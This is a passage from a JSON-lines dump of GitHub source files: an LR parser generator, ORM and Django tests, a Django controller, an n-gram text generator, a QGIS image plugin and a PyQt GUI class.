symbol to a set of\n set of all terminal symbols that can be the first terminal when\n looking for the grammar symbol\n \"\"\"\n if not self._first:\n self._first = calculate_first_sets(self.grammar)\n return self._first\n\n def closure(self, itemset):\n \"\"\" Expand itemset by using epsilon moves \"\"\"\n worklist = list(itemset)\n\n def 
addIt(itm):\n if itm not in itemset:\n itemset.add(itm)\n worklist.append(itm)\n\n def first2(itm):\n # When using the first sets, create a copy:\n f = set(self.first[itm.NextNext])\n if EPS in f:\n f.discard(EPS)\n f.add(itm.look_ahead)\n return f\n\n # Start of algorithm:\n while worklist:\n item = worklist.pop(0)\n if not item.is_shift:\n continue\n if item.Next not in self.grammar.nonterminals:\n continue\n\n C = item.Next\n for add_p in self.grammar.productions_for_name(C):\n for b in first2(item):\n addIt(Item(add_p, 0, b))\n return frozenset(itemset)\n\n def initial_item_set(self):\n \"\"\" Calculates the initial item set \"\"\"\n iis = set()\n for p in self.grammar.productions_for_name(self.grammar.start_symbol):\n iis.add(Item(p, 0, EOF))\n return self.closure(iis)\n\n def next_item_set(self, itemset, symbol):\n \"\"\"\n Determines the next itemset for the current set and a symbol\n This is the goto procedure\n \"\"\"\n next_set = set()\n for item in itemset:\n if item.can_shift_over(symbol):\n next_set.add(item.shifted())\n return self.closure(next_set)\n\n def generate_parser(self):\n \"\"\" Generates a parser from the grammar \"\"\"\n self.logger.debug(\"Generating parser from {}\".format(self.grammar))\n self.generate_tables()\n p = LrParser(self.grammar, self.action_table, self.goto_table)\n self.logger.debug(\"Parser generated\")\n return p\n\n def gen_canonical_set(self, iis):\n \"\"\" Create all LR1 states \"\"\"\n states = set()\n worklist = []\n transitions = {}\n indici = {}\n\n def addSt(s):\n if s not in states:\n worklist.append(s)\n indici[s] = len(indici)\n states.add(s)\n\n addSt(iis)\n\n while worklist:\n itemset = worklist.pop(0)\n for symbol in self.grammar.symbols:\n nis = self.next_item_set(itemset, symbol)\n if not nis:\n continue\n addSt(nis)\n transitions[(indici[itemset], symbol)] = indici[nis]\n return states, transitions, indici\n\n def set_action(self, state, t, action):\n assert isinstance(action, Action)\n assert isinstance(state, int)\n assert isinstance(t, str)\n key = (state, t)\n if key in self.action_table:\n action2 = self.action_table[key]\n if action != action2:\n if isinstance(action2, Reduce) and isinstance(action, Shift):\n # Automatically resolve and do the shift action!\n # Simple, but almost always what you want!!\n self.action_table[key] = action\n elif isinstance(action2, Shift) and isinstance(action, Reduce):\n pass\n else:\n a1 = str(action)\n a2 = str(action2)\n prod = self.grammar.productions[action.rule]\n prod2 = self.grammar.productions[action2.rule]\n raise ParserGenerationException(\n \"LR conflict {} vs {} ({} vs {})\".format(\n a1, a2, prod, prod2\n )\n )\n else:\n self.action_table[key] = action\n\n def generate_tables(self):\n \"\"\" Generate parsing tables \"\"\"\n\n # If no start symbol set, pick the first one!\n if not self.grammar.start_symbol:\n self.grammar.start_symbol = self.grammar.productions[0].name\n\n # Make grammar normal:\n # self.grammar.rewrite_eps_productions()\n # assert self.grammar.is_normal\n\n self.grammar.check_symbols()\n iis = self.initial_item_set()\n self.logger.debug(\"Initial item set: {} items\".format(len(iis)))\n\n # First generate all item sets by using the nextItemset function:\n states, transitions, indici = self.gen_canonical_set(iis)\n self.logger.debug(\"Number of states: {}\".format(len(states)))\n self.logger.debug(\"Number of transitions: {}\".format(len(transitions)))\n\n # Fill action table:\n for state in states:\n state_nr = indici[state]\n # Detect conflicts:\n for item in 
state:\n if item.is_shift and item.Next in self.grammar.terminals:\n # Rule 1, a shift item:\n nextstate = transitions[(state_nr, item.Next)]\n self.set_action(state_nr, item.Next, Shift(nextstate))\n if item.is_reduce:\n if (\n item.production.name == self.grammar.start_symbol\n and item.look_ahead == EOF\n ):\n # Rule 3: accept:\n act = Accept(\n self.grammar.productions.index(item.production)\n )\n else:\n # Rule 2, reduce item:\n act = Reduce(\n self.grammar.productions.index(item.production)\n )\n self.set_action(state_nr, item.look_ahead, act)\n\n # Fill the goto table:\n for nt in self.grammar.nonterminals:\n key = (state_nr, nt)\n if key in transitions:\n self.goto_table[key] = transitions[key]\n\n self.logger.debug(\"Goto table: {}\".format(len(self.goto_table)))\n self.logger.debug(\"Action table: {}\".format(len(self.action_table)))\n return self.action_table, self.goto_table\n","repo_name":"windelbouwman/ppci","sub_path":"ppci/lang/tools/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":13519,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"68"} +{"seq_id":"43223731470","text":"from sqlalchemy.orm import sessionmaker,clear_mappers\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import text\nimport sqlalchemy\nfrom datetime import datetime\nimport pytest\n\nfrom src import models\nfrom src.orm import mapper_reg,start_mappers\n\nfrom tests.test_models import Luna, training_log_entry, JC\n\n@pytest.fixture\ndef in_memory_db():\n engine=create_engine(\"sqlite:///:memory:\")\n mapper_reg.metadata.create_all(engine)\n return engine\n\n@pytest.fixture\ndef session(in_memory_db):\n clear_mappers()\n start_mappers()\n yield sessionmaker(bind=in_memory_db)()\n clear_mappers\n\ndef test_can_add_kennel(session):\n session.execute(text(\"\"\" INSERT INTO \"kennel\" (\"kennel_name\") VALUES ('Team Running Husky')\"\"\"))\n\n session.flush()\n expected=[models.Kennel('Team Running Husky')]\n \n assert list(session.query(models.Kennel).all()) == expected\n\ndef test_kennel_mapper_can_add_line(session):\n new_kennel=models.Kennel('Team Running Husky')\n session.add(new_kennel)\n session.commit()\n\n rows=list(session.execute(text(\"\"\" SELECT \"kennel_name\" FROM \"kennel\" \"\"\")))\n assert rows==[(\"Team Running Husky\",)]\n\ndef test_dog_mapper_can_add_line(session,Luna):\n \n # kennel=models.Kennel('Team Running Husky')\n\n # session.add(kennel)\n # luna_kennel=session.query(models.Kennel).all()\n\n #session.add(models.Dog('Luna',datetime(2017,4,18),kennel,'Husky'))\n \n\n session.add(Luna)\n session.commit()\n\n rows=list(session.execute(text(\"\"\" SELECT \"dog_name\", \"kennel_id\" FROM \"dog\" \"\"\")))\n expected=[(Luna.dog_name,1)]\n print(list(session.query(models.Kennel).all()))\n assert rows==expected\n\ndef test_unique_constraint_on_dog_table(session,Luna):\n session.add(Luna)\n session.commit()\n query=text(\"\"\" INSERT INTO \"dog\" (\"dog_name\", \"date_of_birth\", \"breed\", \"kennel_id\") VALUES (:dogname,:dob,:breed,:kennel_id)\"\"\")\n param={\"dogname\": 'Luna','dob':datetime(2017,4,18).date(),'breed':'Husky','kennel_id':1}\n with pytest.raises(sqlalchemy.exc.IntegrityError):\n session.execute(query,param)\n session.flush()\n \n\ndef test_runner_mapper_can_add_line(session,JC):\n \n session.add(JC)\n session.commit()\n\n rows=list(session.execute(text(\"\"\" SELECT \"runner_name\", \"kennel_id\" FROM \"runner\" \"\"\")))\n expected=[(JC.runner_name,1)]\n 
print(list(session.query(models.Kennel).all()))\n assert rows==expected\n\ndef test_dog_mapper_can_retrive_entry(session,Luna):\n kennel=models.Kennel('Team Running Husky')\n\n session.add(kennel)\n \n query=text(\"\"\" INSERT INTO \"dog\" (\"dog_name\", \"date_of_birth\", \"breed\", \"kennel_id\") VALUES (:dogname,:dob,:breed,:kennel_id)\"\"\")\n param={\"dogname\": 'Luna','dob':datetime(2017,4,18).date(),'breed':'Husky','kennel_id':1}\n session.execute(query,param)\n session.flush()\n \n\n expected=Luna\n \n assert list(session.query(models.Dog).all())[0].date_of_birth == expected.date_of_birth\n assert list(session.query(models.Dog).all())[0].breed == expected.breed\n assert list(session.query(models.Dog).all())[0].dog_name == expected.dog_name\n assert list(session.query(models.Dog).all())[0].kennel_name == expected.kennel_name\n\n\ndef test_can_add_training_entry(session):\n kennel=models.Kennel('Team Running Husky')\n\n session.add(kennel)\n TRH_kennel=session.query(models.Kennel).all()[0]\n\n luna=models.Dog('Luna',datetime(2017,4,18),TRH_kennel,'Husky')\n JC= models.Runner('JC', TRH_kennel)\n bolt=models.Dog('Bolt',datetime(2018,6,12),TRH_kennel,'Husky')\n \n #session.add(models.Dog('Luna',datetime(2017,4,18),kennel,'Husky'))\n \n training_entry= models.Training_Log(datetime.now(), 20,77, luna,None,\"Canicross\",JC,\\\n \"Christie\", 2.4, 3, pace=\"0:03:20\")\n\n print(training_entry.dog1_name.dog_name)\n \n session.add(training_entry)\n session.commit()\n\n query=text(\"\"\" SELECT \"dog1_id\", \"dog2_id\", \"runner_id\", \"sport\",\"weather_id\",\"speed\", \"pace\" FROM \"training_log\" \"\"\")\n \n rows=list(session.execute(query))\n print(rows)\n expected=[(luna.id, bolt.id, JC.id, \"Canicross\", 1, 18, \"0:03:20\"),]\n assert rows==expected\n\ndef test_dog_weight_entry_mapper_can_add_line(session, Luna):\n # session.add(Luna)\n # session.flush()\n luna=models.Dog('Luna',datetime(2017,4,18),models.Kennel('Team Running Husky'),'Husky')\n \n weight_entry=models.Dog_Weight(luna, datetime.now().strftime('%Y/%m/%d'), 35)\n\n session.add(weight_entry)\n session.commit()\n\n query=text(\"\"\" SELECT \"dog_id\", \"dog_age\", \"weight\" FROM \"weight_entry\" \"\"\")\n \n rows=list(session.execute(query).all())\n print(rows)\n expected=[(luna.id, luna.age, 35.0),]\n assert rows==expected\n\ndef test_log_entry_creates_weather_entry(session):\n\n kennel=models.Kennel('Team Running Husky')\n\n session.add(kennel)\n TRH_kennel=session.query(models.Kennel).all()[0]\n\n luna=models.Dog('Luna',datetime(2017,4,18),TRH_kennel,'Husky')\n JC= models.Runner('JC', TRH_kennel)\n bolt=models.Dog('Bolt',datetime(2018,6,12),TRH_kennel,'Husky')\n \n #session.add(models.Dog('Luna',datetime(2017,4,18),kennel,'Husky'))\n \n training_entry= models.Training_Log(datetime.now(), 20,77, luna,None,\"Canicross\",JC,\\\n \"Christie\", 2.4, 3, pace=\"0:03:20\")\n\n \n session.add(training_entry)\n session.commit()\n\n print(list(session.query(models.Weather_Entry).all())[0].timestamp)\n \n \n\n \n\n","repo_name":"JCOno-dit-Biot/training_log_app","sub_path":"tests/test_orm.py","file_name":"test_orm.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11275378881","text":"\nfrom django.conf import settings\nfrom core.lib.controller import Controller, login_required\nfrom core.models.ui import UI\n\n\nclass UIController():\n actions = ['index', 'create', 'search', 'delete_all']\n\n def router(req, **kwargs):\n return 
Controller.route(UIController, UIController.actions, req, kwargs)\n\n def index(req):\n \"\"\" List the all UIs by type \"\"\"\n type = req.GET.get('type');\n uis = UI.objects.filter(**{'type':type}).order_by('name').values()\n return Controller.render_json({'results':list(uis), \"total\": len(uis)})\n\n def create(req):\n id = False\n if req.method == 'POST':\n nw = UI.objects.create(**{'name':req.POST.get('name'),\n 'type':req.POST.get('type'),\n 'markup':req.POST.get('markup'),\n 'group':req.POST.get('group'),\n })\n id = nw.id;\n nw.markup = nw.markup.format(nw.id)\n nw.save()\n return Controller.render_json({'success':True, 'id':id, })\n\n def search(req):\n \"\"\" List search results \"\"\"\n f = {'name__icontains':req.GET.get('keyword', '')}\n locs = Section.objects.filter(**f).order_by('name').values('id', 'name')[:100]\n return Section.render_json({'sections':list(secs), \"total\": len(secs)})\n\n def delete_all(req):\n UI.objects.filter(**{}).delete()\n return Controller.render_json({'action':'delete_all'})\n","repo_name":"scottyadean/picbiz","sub_path":"picbiz/core/controllers/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16873632087","text":"import nltk\r\nimport re\r\nimport pprint as pp\r\nimport numpy as np\r\nimport json\r\n\r\ndictfilt = lambda x, y: dict([ (i,x[i]) for i in x if i in set(y) ])\r\n\r\ndef N_Grams(text, n):\r\n \r\n ngrams, n1gram = [], []\r\n for txt in text:\r\n for i in range(0,n-1):\r\n txt = ' ' + txt\r\n txt = txt + ' '\r\n ngrams += list(nltk.ngrams(txt.split(), n))\r\n n1gram += list(nltk.ngrams(txt.split(), n - 1))\r\n #pp.pprint(ngrams)\r\n #pp.pprint(n1gram)\r\n ngram_freq = {x[0]: x[1] for x in [x for x in nltk.FreqDist(ngrams).items()]}\r\n #print(ngram_freq)\r\n \r\n n1gram_freq = {x[0]: x[1] for x in [x for x in nltk.FreqDist(n1gram).items()]}\r\n #print(n1gram_freq)\r\n \r\n ngram_prob = {}\r\n for k,v in ngram_freq.items():\r\n ngram = k\r\n if ngram[:-1] in n1gram:\r\n prob = v / n1gram_freq[ngram[:-1]]\r\n ngram_prob[k] = prob\r\n \r\n return ngram_prob\r\n\r\ndef generate_text(prob, prompt, n):\r\n\r\n if len(prompt.split(' ')) < (n - 1):\r\n return 'TEXT CANNOT BE GENERATED'\r\n #pp.pprint(prob)\r\n #print(\"prompt:\", prompt.split(' '))\r\n text = ['']\r\n text.extend(prompt.split(' '))\r\n #print(\"text:\", text)\r\n pref_tup = tuple(text[-(n-1):]) \r\n cnt = 0\r\n while (pref_tup[-1] != '') and (cnt < 3):\r\n #print(\"Pref Tuple:\", pref_tup)\r\n #print([tup[:-1] for tup in prob.keys()])\r\n keys = [tup for tup in prob.keys() if pref_tup == tup[:-1]]\r\n if keys == None:\r\n return \" \".join(text[1:])\r\n #print(\"keys:\",keys)\r\n prob_keys = dictfilt(prob, keys)\r\n #print(prob_keys)\r\n max_key = max(prob_keys, key=prob_keys.get)[-1]\r\n #print(\"word:\", max_key)\r\n pref_tup = list(pref_tup)\r\n pref_tup.append(max_key)\r\n pref_tup = tuple(pref_tup[1:])\r\n text.append(max_key)\r\n cnt += 1\r\n #text.append(word)\r\n #print(text[1:])\r\n pred = ' '.join(text[1:])\r\n pred = pred.replace(\"\", \"\")\r\n return pred\r\n\r\ndef preprocess(txt):\r\n\r\n txt = re.sub(r'\\n{2,}|^\\n', '', txt)\r\n txt = re.sub(r'^\\d+\\s|\\s\\d+\\s|\\s\\d+$', ' ', txt)\r\n txt = re.sub(r'\\.', '', txt)\r\n txt = re.sub(r',', '', txt)\r\n return txt\r\n \r\ndef save_model(dict, filename=\"ngram-model.json\"):\r\n dict = {','.join(list(k)):v for k,v in dict.items()}\r\n with open(filename, \"w\") as outfile:\r\n 
json.dump(dict, outfile)\r\n\r\ndef open_model(filename=\"ngram-model.json\"):\r\n with open(filename, \"r\") as f:\r\n data = json.load(f)\r\n data = {tuple(k.split(',')):v for k,v in data.items()}\r\n return data\r\n\r\nif __name__ == \"__main__\":\r\n\r\n text = ['Lorem ipsum dolor sit amet, consectetur adipiscing elit.', \r\n 'Sed massa felis, fermentum et tortor sit amet, semper imperdiet orci.']\r\n text = [preprocess(x) for x in text]\r\n n = 2\r\n prob = N_Grams(text, n)\r\n #print(prob)\r\n save_model(prob)\r\n prob = open_model()\r\n sent = generate_text(prob, 'lorem ipsum dolor', n)\r\n sent = re.sub(r'\\,|\\.', '', sent)\r\n print(sent)\r\n","repo_name":"rambabu264/NLP_n-gram_model","sub_path":"N_Gram/N_Gram.py","file_name":"N_Gram.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34078976991","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\n path('', views.index, name='movies_list'),\n path('movies/', views.details, name='movie_details'),\n path('movies/like', views.watchlist, name='movie_like'),\n path('movies/favorites/',views.favorite,name='movie_favorites'),\n path('watchlist/', views.user_watchlist,name='watch_list'),\n]","repo_name":"jkimuli/filmdeck","sub_path":"movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1270644732","text":"# Create your tests here.\n\n\n# class TestSomeCase(TestCase):\n# def test_my_view(self):\n# client = Client()\n# response = client.get('/test/')\n# self.assertEqual(response.content.decode(), \"Test done!\")\n\nimport pytest\n\nfrom logistic.models import Product\n\n\n@pytest.mark.django_db # give test access to database\ndef test_product_create():\n # Create dummy data\n product = Product.objects.create(\n title=\"new product\",\n description=\"The rely new product for test\", )\n # Assert the dummy data saved as expected\n assert product.title == \"new product\"\n assert product.description == \"The rely new product for test\"\n","repo_name":"sergeMMikh/hw_17.10.2022","sub_path":"logistic/tests_logistic.py","file_name":"tests_logistic.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2189005420","text":"from PyQt4.QtCore import*\nfrom PyQt4.QtGui import*\nfrom qgis.core import*\nfrom qgis.gui import*\n# Initialize Qt resources from file resources.py\nimport resources\n# Import the code for the dialog\nfrom Imagem_dialog import ImagemDialog\nimport os.path\nimport qgis.utils\nimport glob\nimport os.path\nimport numpy as np\nimport os\nimport math\nfrom osgeo import gdal\nimport osr\nimport pyproj\nimport processing\nclass Imagem:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgisInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'Imagem_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n 
self.translator = QTranslator()\n self.translator.load(locale_path)\n\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n\n self.dlg = ImagemDialog()\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&IMAGE PROCESSOR')\n # TODO: We are going to let the user set this up in a future iteration\n self.toolbar = self.iface.addToolBar(u'Imagem')\n self.toolbar.setObjectName(u'Imagem')\n\n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('Imagem', message)\n\n\n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. 
Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n # Create the dialog (after translation) and keep reference\n self.dlg = ImagemDialog()\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n if add_to_menu:\n self.iface.addPluginToMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\"\n\n icon_path = ':/plugins/Imagem/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'PDI'),\n callback=self.run,\n parent=self.iface.mainWindow())\n self.dlg.caminho.clear()\n self.dlg.ponto2.clear()\n self.dlg.pushButton.clicked.connect(self.selecionar_saida) #conectando o botão para salvar o ponto1\n self.dlg.pushButton_2.clicked.connect(self.salvar_ponto2) #conectando o botão para salvar o ponto 2.\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n for action in self.actions:\n self.iface.removePluginMenu(\n self.tr(u'&IMAGE PROCESSOR'),\n action)\n self.iface.removeToolBarIcon(action)\n # remove the toolbar\n del self.toolbar\n\n #Abaixo a função para que s eposso salvar os vetores de ponto 1 e 2.\n def selecionar_saida(self):\n arquivoCaminho = QFileDialog.getSaveFileName(self.dlg, \"Salvar o arquivo em: \", \"\", \"*.shp\")\n self.dlg.caminho.setText(arquivoCaminho)\n\n def salvar_ponto2(self):\n ponto2_caminho = QFileDialog.getSaveFileName(self.dlg, \"Salvar o arquivo em: \", \"\", \"*.shp\")\n self.dlg.ponto2.setText(ponto2_caminho)\n\n\n def run(self):\n \"\"\"Run method that performs all the real work\"\"\"\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n\n self.dlg.show()\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n self.dlg.show()\n #atribuir função as janelas do qt4\n imagens = self.dlg.mMapLayerComboBox.currentLayer()\n latitude= self.dlg.lineEdit.text() #inserir valor da latitude\n longitude= self.dlg.lineEdit_2.text() #inserir valor da longitude\n latitude2= self.dlg.lineEdit_3.text() #inserir valor da latitude2\n longitude2= self.dlg.lineEdit_4.text() #inserir valor da longitude2\n projecao= self.dlg.lineEdit_5.text() #inserir o EPSG da projeção\n localSalvo = self.dlg.caminho.text() #inserir o caminho para salvar ponto 1\n localSalvo2 = self.dlg.ponto2.text() #inserir o caminho para salvar o ponto 2.\n latitudedist=float(latitude) #transformando em float\n longitudedist=float(longitude) #transformando em float\n latitude2dist=float(latitude2) #transformando em float\n longitude2dist=float(longitude2) #transformando em float\n\n #Cálculo de distância euclidiana entre os 2 pontos coletados na imagem em .m\n\n a= np.array((latitudedist,longitudedist))\n b = np.array((latitude2dist, longitude2dist))\n dist = np.linalg.norm(a-b)\n self.dlg.distancia.setValue(dist)\n\n #configurando o QSlider para definir valor do contraste\n\n self.dlg.sl.setMinimum(0)\n self.dlg.sl.setMaximum(255)\n contraste = self.dlg.sl.value()\n\n #abaixo o código para ler a imagem no maplayer e adicionar o contraste e em seguida exibir no Qgis\n #selecionada= QgsMapLayerRegistry.instance().mapLayersByName(imagens)[0]\n contrastFilter=QgsBrightnessContrastFilter()\n 
contrastFilter.setContrast(float(contraste))\n imagens.pipe().set(contrastFilter)\n imagens.triggerRepaint()\n\n #modificando o nome do layer após alteração\n if contraste is not 0:\n for imagens in QgsMapLayerRegistry.instance().mapLayers().values():\n imagens.setLayerName('contraste_mod')\n else:\n imagens.setLayerName('Original')\n QgsMapLayerRegistry.instance().addMapLayer(imagens)\n\n # Verificando a extensão da imagem em X e Y\n\n if imagens is not None:\n\n xsize = imagens.rasterUnitsPerPixelX()\n ysize = imagens.rasterUnitsPerPixelY()\n\n extent = imagens.extent()\n\n # obtendo as cordenadas de tamanho da imagem na correspondente unidadee desta.\n ymax = extent.yMaximum()\n ymin=extent.yMinimum()\n xmax = extent.xMaximum()\n xmin = extent.xMinimum()\n self.dlg.xmax.setText(str(xmax))\n self.dlg.xmin.setText(str(xmin))\n self.dlg.ymax.setText(str(ymax))\n self.dlg.ymin.setText(str(ymin))\n\n\n #transformando as coordenadas do ponto 1 em coordenada linha x coluna\n\n t= ymax - longitudedist\n v= latitudedist - xmin\n\n row = int((t/ ysize) + 1)\n column = int((v / xsize) + 1)\n self.dlg.linhas.setText(str(row))\n self.dlg.colunas.setText(str(column))\n\n #transformando as coordenadas do ponto 2 em coordenada linha x coluna\n\n t1= ymax - longitude2dist\n v1= latitude2dist - xmin\n\n row = int((t1/ ysize) + 1)\n column = int((v1/ xsize) + 1)\n self.dlg.linhas2.setText(str(row))\n self.dlg.colunas2.setText(str(column))\n\n\n #abaixo será criado o ponto 1\n camada = QgsVectorLayer('Point?crs=epsg:'+projecao, 'PONTO 1' , 'memory')\n pr = camada.dataProvider()\n ponto = QgsPoint(float(latitude),float(longitude))\n pt= QgsFeature()\n pt.setGeometry(QgsGeometry.fromPoint(ponto))\n pr.addFeatures([pt])\n camada.updateExtents()\n QgsMapLayerRegistry.instance().addMapLayers([camada])\n properties = {'size': '2.0', 'red': '255,0,0'}\n symbol_layer = QgsSimpleMarkerSymbolLayerV2.create(properties)\n camada.rendererV2().symbols()[0].changeSymbolLayer(0, symbol_layer)\n canvas = self.iface.mapCanvas()\n extent = camada.extent()\n canvas.setExtent(extent)\n\n #abaixo será criado o ponto 2\n camada2 = QgsVectorLayer('Point?crs=epsg:'+projecao, 'PONTO 2' , 'memory')\n pr2 = camada2.dataProvider()\n ponto2 = QgsPoint(float(latitude2),float(longitude2))\n pt2= QgsFeature()\n pt2.setGeometry(QgsGeometry.fromPoint(ponto2))\n pr2.addFeatures([pt2])\n camada2.updateExtents()\n QgsMapLayerRegistry.instance().addMapLayers([camada2])\n properties2 = {'size': '2.0', 'green': '0,255,0'}\n symbol2_layer = QgsSimpleMarkerSymbolLayerV2.create(properties2)\n camada2.rendererV2().symbols()[0].changeSymbolLayer(0, symbol2_layer)\n canvas2 = self.iface.mapCanvas()\n extent2 = camada2.extent()\n canvas.setExtent(extent2)\n\n #recrevendo todos arquivos vetores gerados para serem salvos em uma pasta selecionada.\n\n QgsVectorFileWriter.writeAsVectorFormat(camada, localSalvo, \"utf_8_encode\", camada.crs(), \"ESRI Shapefile\")\n pnt_layer = QgsVectorLayer(localSalvo, \"Ponto B2E\", \"ogr\")\n QgsVectorFileWriter.writeAsVectorFormat(camada2, localSalvo2, \"utf_8_encode\", camada2.crs(), \"ESRI Shapefile\")\n pnt_layer2 = QgsVectorLayer(localSalvo2, \"Ponto B2E\", \"ogr\")\n","repo_name":"joycerdsilva/imageprocessor","sub_path":"Imagem.py","file_name":"Imagem.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4749783253","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui, QtCore\nimport sys, copy, 
traceback\nfrom gtdev.helper_methods import *\n\n\n## control class for the interface between GUI and calculation\nclass GUIcalcIO(QtGui.QWidget):\n ## @var cobj\n # master object for storing the component,\n # can be any instance of an AbstractTurbo class\n # @see AbstractTurbo\n cobj = 0\n\n ## @var tableList\n # storage for all input/output tables,\n # this is a list of lists of QTableWidget\n # @code\n # tableList[0]: tables for the parent component\n # tableList[0][0]: table for the thermodynamic input data\n # tableList[0][1]: table for the thermodynamic output data\n # tableList[0][2]: table for the aerodynamic input data\n # tableList[0][3]: table for the aerodynamic output data\n # tableList[1]: tables for the 1st sub-component\n # tableList[1][:]: tables for the thermo- & aerodynamic in/output data\n # tableList[2]: tables for the 2nd sub-component\n # ...\n # @endcode\n tableList = []\n\n ## Constructor\n #\n # initialize the GUI and all associated widgets\n def __init__(self, cobj_, parent_=None):\n QtGui.QWidget.__init__(self, parent_)\n\n # the man tab widget usually is the parent\n # (but this could be any Qt widget)\n self.parent = parent_\n\n # store the reference for the component\n # @todo check type of cobj_\n self.cobj = cobj_\n\n # widget layout\n self.calcThermoButton = QtGui.QPushButton(\"Calculate Thermodynamics\")\n self.calcAeroButton = QtGui.QPushButton(\"Calculate Aerodynamics\")\n self.calcAeroButton.setEnabled(0)\n\n self.connect(self.calcThermoButton, QtCore.SIGNAL(\"clicked()\"), self.calcThermodynamics)\n self.connect(self.calcAeroButton, QtCore.SIGNAL(\"clicked()\"), self.calcAerodynamics)\n\n self.thermoDone = False\n self.aeroDone = False\n\n # additional buttons if embedded within tab widget\n if self.parentWidget() != 0:\n self.exportSelectedButton = QtGui.QPushButton(\"Export Selected Component\")\n self.closeTabButton = QtGui.QPushButton(\"Close Tab\")\n\n self.connect(self.exportSelectedButton, QtCore.SIGNAL(\"clicked()\"), self.exportSelected)\n self.connect(self.closeTabButton, QtCore.SIGNAL(\"clicked()\"), self.parentWidget().closeTab)\n\n # component tree\n self.tree = QtGui.QTreeWidget()\n self.initTree()\n self.connect(self.tree, QtCore.SIGNAL('itemSelectionChanged()'), self.getActiveWidget)\n\n # widget stack\n self.initIOList()\n\n # error handling\n self.calcErr = QtGui.QErrorMessage()\n\n # layout\n leftbox = QtGui.QWidget()\n vboxtree = QtGui.QVBoxLayout()\n vboxtree.addWidget(self.tree)\n vboxtree.addWidget(self.calcThermoButton)\n vboxtree.addWidget(self.calcAeroButton)\n if self.parentWidget() != 0:\n vboxtree.addWidget(self.exportSelectedButton)\n vboxtree.addWidget(self.closeTabButton)\n leftbox.setLayout(vboxtree)\n\n splitter = QtGui.QSplitter()\n splitter.addWidget(leftbox)\n splitter.addWidget(self.ioWidgetStack)\n\n vbox0 = QtGui.QVBoxLayout()\n vbox0.addWidget(splitter)\n\n self.setLayout(vbox0)\n\n ## initialize structure tree\n #\n # build the structure tree based on the current cobj\n # the current component (cobj) will be the master node,\n # to which a list of corresponding sub-components as children (if present) is appended\n def initTree(self):\n if self.cobj == None:\n self.getMasterComponent()\n\n self.tree = QtGui.QTreeWidget()\n self.tree.setColumnCount(2)\n self.tree.setHeaderLabels([\"Component Name\", \"Type\"])\n\n masterTreeItem = QtGui.QTreeWidgetItem()\n masterTreeItem.setText(0, self.cobj.identification)\n masterTreeItem.setText(1, str(self.cobj))\n subTreeItems = []\n for elem in 
